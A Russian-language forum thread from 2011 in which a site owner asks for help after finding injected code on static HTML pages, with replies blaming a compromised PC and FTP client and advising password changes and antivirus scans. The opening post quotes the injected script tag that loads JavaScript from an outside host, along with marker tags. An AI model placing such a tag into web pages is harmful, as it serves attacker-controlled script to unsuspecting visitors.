Старый 12.04.2011, 21:18   #1
Специалист
 
Аватар для Салоед
 
Регистрация: 15.10.2010
Сообщений: 463
Вес репутации: 130
Салоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордится
По умолчанию Обнаружен вредоносный код на сайте

День добрый панове.
Ситуация следующая. ЯВМ обнаружил вредоносный код на главных страницах некоторых моих сайтов. Все сайты статичные, на ХТМЛ и ЦСС. Пароли фтп-доступа известны только Сапе.
Вредоносный код я сразу увидел глазами, просмотрев код страниц. Вот он:

<script type="text/javascript" src="http://ist.net.tr/js.php"></script>

и вот еще:

<meta name='fd348c652c50e6a87fd1beef14fed626' content=''>

<!--8200A49E0C2ADFC6C33D295D0CFA6688-->

Вопрос: как это вообще возможно и где искать дыры?
Я просмотрел резервные копии файлов главных страниц у себя на компе, там этого кода нет.
Салоед вне форума   Ответить с цитированием
Старый 12.04.2011, 21:22   #2
Banned
 
Регистрация: 17.02.2008
Адрес: Донецк, ДНР
Сообщений: 8,783
Вес репутации: 0
SergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Салоед Посмотреть сообщение
как это вообще возможно и где искать дыры?
Дыры ищите у себя в компьютере. фтп-клиентом каким пользуетесь?


Цитата:
Сообщение от Салоед Посмотреть сообщение
Пароли фтп-доступа известны только Сапе.
Врёте.
SergejF вне форума   Ответить с цитированием
Старый 12.04.2011, 21:25   #3
Специалист
 
Аватар для Салоед
 
Регистрация: 15.10.2010
Сообщений: 463
Вес репутации: 130
Салоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордитсяСалоед - за этого человека можно гордится
По умолчанию

Ну кроме сапы еще и мне. Так, дыра точно у меня в компе. На сайте, который не в сапе тоже нашел вредоносный код. Пользуюсь старой файрзиллой. Что-то конкретное порекомендуете?
Салоед вне форума   Ответить с цитированием
Старый 12.04.2011, 22:28   #4
Banned
 
Регистрация: 17.02.2008
Адрес: Донецк, ДНР
Сообщений: 8,783
Вес репутации: 0
SergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущееSergejF - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Салоед Посмотреть сообщение
Что-то конкретное порекомендуете?
Меняем пароли доступа, проверяем комп KIS с последними базами и CureIt, затем снова меняем пароли. Не на старые!
SergejF вне форума   Ответить с цитированием
Старый 12.04.2011, 23:52   #5
Новичок
 
Регистрация: 26.06.2009
Сообщений: 45
Вес репутации: 126
mirsobchak.ru скоро станет известен
По умолчанию

было подобное, с тех пор практически ежедневно обновляю антивирусную базу
mirsobchak.ru вне форума   Ответить с цитированием
Старый 13.04.2011, 00:36   #6
Пожиратель черепашкоВ
 
Аватар для chahlic
 
Регистрация: 24.12.2008
Адрес: Телемелетрямдия
Сообщений: 4,746
Вес репутации: 340
chahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущееchahlic - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Салоед Посмотреть сообщение
Что-то конкретное порекомендуете?
И не хранить пароли в фтп-клиенте
__________________
Смотри цены в САПе в своей валюте: плагин "Конвертер Валют" для ФФ.
chahlic вне форума   Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вредоносный код на сайте. Подскажите. Dorian Яндекс 34 13.02.2011 21:30
На сайте, не участвующем в бирже sape обнаружен код! dohtor2010 Вопросы по работе системы 3 05.11.2010 04:40
Вредоносный код Maksim84 Яндекс 33 24.02.2010 14:08
Быстроробот обнаружен. Smerch-M Яндекс 9 20.08.2009 21:18
В космосе обнаружен логотип Firefox tophis Курилка 10 04.11.2008 11:01


Часовой пояс GMT +3, время: 04:48.